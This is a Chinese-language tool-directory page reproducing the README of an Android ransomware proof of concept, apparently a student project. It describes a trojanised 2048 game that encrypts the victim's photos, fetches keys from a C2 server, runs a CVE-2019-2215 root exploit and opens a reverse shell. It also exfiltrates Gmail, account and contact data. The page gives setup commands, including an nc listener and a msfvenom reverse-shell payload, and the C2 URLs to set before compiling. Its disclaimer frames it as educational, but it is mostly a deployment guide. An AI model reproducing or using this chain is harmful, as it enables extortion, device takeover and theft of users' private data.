Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Rootsmart-v2.0 — Android 勒索软件开发 - AES256 加密 + CVE-2019-2215 (反向 root shell) + 数据外泄 | Kitploit
工具/GitHubGitHub/crackercat/rootsmart-v2.0
Android安全加密/解密工具漏洞分析漏洞利用逆向工程数据泄露渗透测试移动安全命令与控制学习与教育Payload 开发
GitHub
274年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
crackercat/rootsmart-v2.0

Rootsmart-v2.0

Android 勒索软件开发 - AES256 加密 + CVE-2019-2215 (反向 root shell) + 数据外泄

查看仓库

Rootsmart 2.0(含 cve-2019-2215 + 勒索软件)

免责声明

该项目仅用于教育目的。该项目使用了来自 rkshrksh/2048-Game 和 kangtastic/cve-2019-2215 的代码。


项目描述

本项目是新加坡理工大学移动安全模块的一部分。项目在 6 周内完成,目标是开发一个恶意 Android 应用程序。通过这样做,我们了解了 Android 操作系统中的安全机制是如何实现的,以及如何实践 OWASP Mobile Top 10:2017 M8 - 代码篡改。

该项目是一个概念验证,展示了一个自定义勒索软件,它利用 AES 加密、将 cve-2019-2215 武器化,并从受感染设备窃取数据。

已在 Android 10 和 Google Pixel 2 XL 上测试。

root@kitploit:~
├── 2048-Game 					// Android 项目文件夹
├── 2048-keystore				// 测试密钥库
├── cve-2019-2215				// 修改后的 cve-2019-2215
│	└── cve-2019-2215.c
├── dropper_server				// Dropper 服务器目录 
│	├── cve-2019-2215			// 压缩前的 shells.zip 内容
│	├── dropper_server.py		// Dropper 服务器程序
│	├── exfiltrated_data.log
│	├── masterkeys.txt
│	├── ncat.exe 				// Netcat Windows 二进制文件 - 用于反向 Shell 监听
│	├── requirements.txt
│	├── shells.zip  			// 托管在 dropper 服务器根目录中的 shells.zip
│	└── venv
└── test_images    				// test_images 用于轻松 adb push <image.ext> /sdcard/Pictures
攻击向量:
  1. 安装、运行应用程序并授予权限
  2. 勒索软件将使用 AES 加密 /sdcard/Pictures 中的所有文件
  3. 每个文件将使用随机生成的密钥进行加密
  4. 密钥将存储在 /sdcard/keys.json 中,每个 key:value 对为 filepath:key
  5. 向 C2 服务器 /get_mk 发送 GET HTTP 请求,以从响应体中获取 MasterKey 和 VictimID
  6. MasterKey 将加密 keys.json,VictimID 将存储在 /sdcard/victimID.txt 中
  7. 应用程序将下载 shells.zip 并解压内容
  8. 执行从解压内容中提取的 cve-2019-2215 二进制文件
  9. 将生成一个 root shell 进程,并运行解压内容中的 install.sh
  10. Install.sh 将执行解压内容中的 rs.elf,以向攻击服务器发送反向连接
  11. 应用程序将窃取设备的 Gmail、用户账户信息和联系人。
演示

https://user-images.githubusercontent.com/56181271/155875246-092a3954-2f42-42b7-a00e-581a1bbf0546.mp4


C2(命令与控制)- 设置

对于此测试,请确保受害手机和 C2 服务器位于同一子网中(否则请将 C2 托管在公共互联网上)。C2 服务器有 3 个端点,可在 dropper/dropper_server.py 中找到:

  1. /process_command - GET 以下载 shells.zip 并运行 cve-2019-2215 root 漏洞利用
  2. /get_mk - GET 以获取 victimID:masterkey 键值对,用于加密 /sdcard/keys.json
  3. /postData - POST 被窃取的 Gmail、联系人、账户信息
反向 Shell 服务器
root@kitploit:~
nc -lvnp 1337 # 理想情况下,此 IP 应与 dropper 服务器的 IP 相同
Dropper 服务器
root@kitploit:~
# 生成 rs.elf 载荷
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f elf > rs.elf

# 如果 WSL 不将 localhost 流量转发到 Windows 主机,则最好在 Windows 上运行 flask
cd dropper
python3 -m venv venv # 创建 venv

# 激活 venv
. venv/bin/activate # Linux
venv\Scripts\activate.bat # Windows
pip install -r requirements.txt --upgrade pip # 确保主机 shell 是 root/Administrator

# 运行 C2 服务器
python3 dropper_server.py # WSL
python dropper_server.py # Windows

位于 /dropper 的 shells.zip

  1. 进入 dropper/cve-2019-2215 文件夹
  2. 创建 rs.elf 后,将 rs.elf + cve-2019-2215 和 install.sh 压缩打包
  3. 将 zip 文件重命名为 shells.zip
  4. 将 shells.zip 移动到 /dropper

编译 APK 前修改以下内容

Java 类

root@kitploit:~
// 文件 : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// 根据 dropper 服务器的 IP 和端口修改 IP 和端口
String URL = "http://192.168.157.73:8080/process_command"; // 第 19 行

// 文件 : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// 根据 dropper 服务器的 IP 和端口修改 IP 和端口
String URL = "http://192.168.157.73:8080/get_mk"; // 第 45 行

// 文件 : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// 根据 dropper 服务器的 IP 和端口修改 IP 和端口
String urlString = "http://192.168.157.73:8080/postData"; // 第 32 行
下载工具